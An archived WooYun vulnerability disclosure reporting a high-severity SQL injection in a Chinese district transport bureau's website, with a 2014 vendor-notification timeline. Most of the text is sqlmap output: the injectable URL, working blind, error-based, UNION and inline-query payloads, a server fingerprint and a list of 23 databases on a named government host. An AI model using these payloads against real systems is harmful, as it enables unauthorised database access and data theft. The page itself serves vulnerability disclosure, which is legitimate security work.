乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-09: 细节已通知厂商并且等待厂商处理中 2014-10-13: 厂商已经确认,细节仅向厂商公开 2014-10-23: 细节向核心白帽子及相关领域专家公开 2014-11-02: 细节向普通白帽子公开 2014-11-12: 细节向实习白帽子公开 2014-11-23: 细节向公众公开
某交通运输局存在高危SQL注入漏洞,超20个数据库全部泄露
定海区交通运输局
注射地址:
http://dhjtj.gov.cn/detaildiaocha.aspx?dc=5&dp=6
---Place: GETParameter: dp Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dc=5&dp=6 AND 1508=1508 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: dc=5&dp=6 AND 6252=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(99)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6252=6252) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(117)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: dc=5&dp=6 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(99)+CHAR(118)+CHAR(113)+CHAR(86)+CHAR(103)+CHAR(112)+CHAR(83)+CHAR(121)+CHAR(119)+CHAR(112)+CHAR(87)+CHAR(77)+CHAR(77)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(117)+CHAR(113)-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: dc=5&dp=(SELECT CHAR(113)+CHAR(121)+CHAR(99)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9254=9254) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(117)+CHAR(113))---[21:05:10] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[21:05:10] [INFO] testing if current user is DBAcurrent user is DBA: Falseavailable databases [23]: [*] bzemail[*] caizheng[*] cbq[*] charity[*] DinghaiStatistics[*] FaGaiWei[*] jiefang[*] laoniantixie[*] LianZhengDB[*] master[*] model[*] msdb[*] newepaper[*] Northwind[*] oldcity[*] paimai[*] pubs[*] qingming[*] tempdb[*] toursim[*] WebTemplateSQLSERVER[*] women[*] yancang
紧急修复
危害等级:高
漏洞Rank:10
确认时间:2014-10-13 11:42
暂无